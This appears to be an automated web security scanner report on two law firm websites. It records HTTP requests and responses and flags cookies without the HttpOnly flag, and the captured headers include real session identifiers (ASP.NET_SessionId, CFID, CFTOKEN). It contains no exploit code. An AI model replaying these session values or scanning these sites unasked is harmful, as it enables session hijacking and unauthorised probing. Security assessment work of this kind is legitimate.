GET /seminars/act_eventbanner_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hoganlovells.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AboutUs/Online_Client_Service/Overview/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
...var enterKeyButtonSearch = ""; var typeAheadParentID = ""; var typeAheadList = "#nameTypeAhead"; var AttorneyTypeAheadWS = "/FCWSite/HoganHartsonWS/HHWebServices.asmx"; var disableTypeAheadBlur ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//v1.7 // Flash Player Version Detection // Detect Client Browser type // Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved. var isIE = (navigator.appVersion.indexOf("MSIE") != ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
...// Styles for browser specific versions. document.writeln("<style type=\"text/css\">"); // Not IE Browsers if (!$.browser.msie) { document.writeln("body .header .topnav ul li.on {background ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
// SpamProof jscript methods //To be used to prevent spammers from grabbing email addresses from a website // //Example: //For more information contact our <Script language="JavaScript">PrintMail( ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aboutus/history/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aboutus/overview/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is a law firm that sees the whole picture an ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /de/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /es/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fr/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ YAHOO.util.Color=function(){var A="0123456789A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ (function(){YAHOO.util.Config=function(D){if(D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ YAHOO.widget.Slider=function(C,A,B,D){YAHOO.wi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ if(typeof YAHOO=="undefined"||!YAHOO){var YAHO ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /industries/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ja/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/awardsrankings/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/fastfacts/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/newspubs/List.aspx HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/newspubs/detail.aspx?news=1779 HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/timeline/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /offices/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ourpeople/List.aspx HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /practiceAreas/area.aspx?firmService=1720 HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
